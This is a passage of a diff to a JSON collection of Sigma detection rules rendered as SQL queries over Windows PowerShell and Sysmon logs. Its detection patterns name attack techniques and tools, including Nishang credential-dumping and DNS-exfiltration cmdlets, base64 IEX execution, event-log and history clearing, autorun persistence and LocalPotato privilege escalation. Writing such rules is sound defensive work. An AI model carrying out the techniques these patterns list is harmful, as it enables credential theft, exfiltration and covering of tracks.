"experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Direct Autorun Keys Modification", + "id": "24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_localuser.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "title": "Remote Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "author": "frack113", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" ], - "filename": "posh_ps_win32_product_install_msi.yml" + "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "status": "experimental", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Testing Usage of Uncommonly Used Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative script" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Unknown" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Data Compressed - PowerShell", - "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "status": "test", - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1560" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Highly likely if archive operations are done via PowerShell." + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_data_compressed.yml" + "filename": "proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Discovery of a System Time", + "id": "b243b280-65fe-48df-ba07-6ddea7646427", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use of the system utilities to discover system time for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_remote_time_discovery.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.t1574.002" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE 